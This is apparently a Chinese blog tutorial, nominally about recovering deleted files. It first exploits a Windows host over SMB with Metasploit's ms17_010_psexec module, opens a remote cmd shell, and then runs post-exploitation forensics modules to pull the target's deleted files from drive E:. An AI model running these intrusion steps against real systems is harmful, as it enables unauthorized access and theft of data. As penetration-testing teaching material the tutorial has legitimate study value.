相关阅读
数据恢复
取证相关
Kali linux
Metasploit
Kali linux本身就自带,如果你觉得还不满足可以尝试Pro
视频讲解
你是否会遇到不小心删除了文件,同时清空了回收站?本期视频带你一起看看,黑客在入侵后是如何对删除文件进行恢复、并完成取证的,如何通过metasploit框架恢复电脑磁盘里删除过的文件!
图文讲解
接管目标计算机
启动Metasploit渗透测试框架
sudo msfconsole
搜索eternal
模块
search eternal
![图片[1]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713034252263-1024x295.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
使用编号1的模块exploit/windows/smb/ms17_010_psexec
use 1
![图片[2]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713034553442-1024x360.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后设置目标服务器的IP地址
set RHOSTS 192.168.0.186
![图片[3]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713034433333-1024x336.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后运行
exploit
这里显示已经接管了目标机器
![图片[4]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713034734957.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
您可以输入下面的命令接管windows电脑的cmd终端
shell
![图片[5]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713034838123-1024x667.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
输入下面的命令可以退出进行我们的后续操作
exit
我们继续输入下面的命令,让会话在后台运行
background
![图片[6]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713034936734.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
数据恢复与取证
接下来是我们每个人最关注的,如何恢复我们删除的文件?
我们将使用post/windows/gather/forensics/enum_drives
模块
use post/windows/gather/forensics/enum_drives
![图片[7]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713035037772.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后我们刚才在后台运行的会话是SESSION 1,因此我们需要设置该模块针对的会话是SESSION 1
set SESSION 1
然后运行
run
这里我们可以看到驱动盘
![图片[8]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713035211953.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们这里可以直接下一步,开始恢复E盘的数据,使用post/windows/gather/forensics/recovery_files
模块
use post/windows/gather/forensics/recovery_files
然后设置磁盘为E盘,因为我们一开始是在E盘删除的文件
set DRIVE E:
然后设置会话为SESSION 1
set SESSION 1
![图片[9]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713035406989-1024x285.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后运行该模块
run
我们发现这里已经找到了两个被回收站删掉的文件
![图片[10]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713035540135.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们这里尝试进行恢复
set FILES 356909056,356910080
上面设置的文件要填写刚才我们找到的文件ID编号
然后运行
run
我们可以看到文件已经恢复到了/root/.msf4/loot
目录下
![图片[11]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713035619310-1024x673.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们进入对应的路径
cd /root/.msf4/loot
使用cat
命令查看其中的文件,发现和删除的简直一模一样,到这里恢复数据、进行取证就结束了!
![图片[12]-黑客是如何恢复任意删除的文件?回收站清空的也可以!-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/07/20220713035806448-1024x156.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
希望今天的教程你能学到很多😊
© 版权声明
THE END
- 最新
- 最热
只看作者